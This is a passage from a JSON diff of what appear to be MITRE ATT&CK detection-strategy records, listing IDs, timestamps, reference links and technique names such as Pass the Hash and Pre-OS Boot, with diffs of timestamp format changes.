+                    "modified": "2026-05-12 16:34:50.678000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0515",
+                            "external_id": "DET0515"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for T1528 - Steal Application Access Token",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--78821450-c84f-498f-abf2-b43211fa4218",
+                        "x-mitre-analytic--70f6482e-e93b-45a5-9b8c-ba7fd0c8220a",
+                        "x-mitre-analytic--a064fdd2-4293-4aff-a91b-e06ac8bf9262",
+                        "x-mitre-analytic--da365d5b-c955-46f6-99c2-cd57a3560a57",
+                        "x-mitre-analytic--0677b819-0586-454c-9f4d-c861ccaf1b73"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.678000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--abf6c96c-09f3-4bea-a5b7-1177f99881bc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.688000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0278",
+                            "external_id": "DET0278"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for T1542 Pre-OS Boot",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e2ca60b5-82df-4e7e-8528-dd24d9a79750",
+                        "x-mitre-analytic--08dd2c3b-e07c-4b47-bae6-aa09c2a86d87",
+                        "x-mitre-analytic--43834e1c-533a-4f08-b508-8632d35b10ad",
+                        "x-mitre-analytic--e64aebfd-8343-45ec-bdce-6681a8255637"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.688000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e90ab093-47a3-4c05-80b1-1919d2362ea9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0099",
+                            "external_id": "DET0099"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for T1542.001 Pre-OS Boot: System Firmware",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--59d44906-a35e-4b0f-ab84-df3bfa6df8f9",
+                        "x-mitre-analytic--ceb2c722-f9ec-41de-980e-d8848b1cb20c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a53d62ae-b269-45e8-9937-17def4e28663",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.686000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0323",
+                            "external_id": "DET0323"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for T1542.002 Pre-OS Boot: Component Firmware",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--6f2fdf37-f603-4264-aed1-24fe2d1aa094",
+                        "x-mitre-analytic--062580eb-eb79-4b31-b3fd-e500ebcfc128",
+                        "x-mitre-analytic--c89e4f72-a563-4665-9934-14b9efe88a06"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.686000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c3924c07-255d-4df9-8357-a47e68c04bbb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.691000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0175",
+                            "external_id": "DET0175"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for T1542.004 Pre-OS Boot: ROMMONkit",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ca649f9b-2a1f-4d45-b61b-33ac38d6a4ee"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.691000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--8f6ddd50-aeb8-48ae-8f4a-83b314829ca3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.684000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0582",
+                            "external_id": "DET0582"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for T1542.005 Pre-OS Boot: TFTP Boot",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--92004715-82f0-409d-a520-fc49720e4f3d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.684000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--04f3b20d-e208-4ca3-b1e5-9e996013bc8a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.667000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0330",
+                            "external_id": "DET0330"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for T1546.016 - Event Triggered Execution via Installer Packages",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--3ae8f3c1-c3a1-4c45-9231-1bb6f9c61ee1",
+                        "x-mitre-analytic--2f9c7e44-de3a-4fbd-955a-482ef9f341ed",
+                        "x-mitre-analytic--9c9db399-4f87-477b-be31-536857b7912d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.667000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--408fb023-a9d7-473c-8db8-a7d3c66eded7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.675000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0375",
+                            "external_id": "DET0375"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for T1546.017 - Udev Rules (Linux)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c1167779-9df4-4387-b777-4da097c6b033"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.675000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--300931b1-bd28-4e91-ba6e-585f3563e8e4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.673000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0180",
+                            "external_id": "DET0180"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for T1547.009 \u2013 Shortcut Modification (Windows)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--5f9fdff8-55ed-4b1e-8889-46b376ce7149"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.673000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a62dbd10-5b61-489c-a465-8f792792778e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.687000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0204",
+                            "external_id": "DET0204"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for T1547.010 \u2013 Port Monitor DLL Persistence via spoolsv.exe (Windows)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--61729716-59f3-433e-a678-101c18040851"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.687000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f3cd8bda-d509-4452-a119-3feebb8f05b6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0121",
+                            "external_id": "DET0121"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for T1547.015 \u2013 Login Items on macOS",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--89e3509c-d732-4826-ac78-baea8fbf0834"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d6619253-10cd-4b90-84b5-364c418d2484",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0388",
+                            "external_id": "DET0388"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for T1548.002 \u2013 Bypass User Account Control (UAC)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--13a875c4-87d2-448e-a46e-970e1f9ad5da"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--5692084b-878d-44f7-8b38-a3d125894845",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.678000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0409",
+                            "external_id": "DET0409"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for T1550.002 - Pass the Hash (Windows)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d1bcc6a4-e84a-4251-b86b-e8fe2ecc0dd1"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.678000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--5f53739d-3a41-4f7e-a83d-219a0c64e7a1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0352",
+                            "external_id": "DET0352"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for T1550.003 - Pass the Ticket (Windows)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--54ffc701-eb6c-4e3e-8615-0c6f8b327a34"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a14db1ea-e57e-4bc4-83bb-94a6e7da87b0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.686000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0467",
+                            "external_id": "DET0467"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for TLS Callback Injection via PE Memory Modification and Hollowing",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--44500eb7-01f2-4cab-8b76-1227bb48e13e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.686000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--210a0dee-7c4b-4948-80ed-67c3e04886c2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0393",
+                            "external_id": "DET0393"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Temporary Elevated Cloud Access Abuse (T1548.005)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--adfcc782-0285-43ef-af18-127dd60d1dff",
+                        "x-mitre-analytic--23b9a5cd-9c49-48d8-9d0d-71e35ad78337",
+                        "x-mitre-analytic--2ec84f0f-1148-4821-acf0-a5527381865f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--69c06a1c-5b36-432c-871b-813957b3c678",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.680000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0403",
+                            "external_id": "DET0403"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Traffic Duplication via Mirroring in IaaS and Network Devices",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7becb616-f907-4533-a425-08ca42440e3f",
+                        "x-mitre-analytic--0729dd54-2fda-460a-8bb3-eee02f0f3c4e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.680000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--6d2e2f19-f5ae-4ba0-aea7-52cc257169e5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.680000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0012",
+                            "external_id": "DET0012"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for VBA Stomping",
+                    "x_mitre_analytic_refs": [
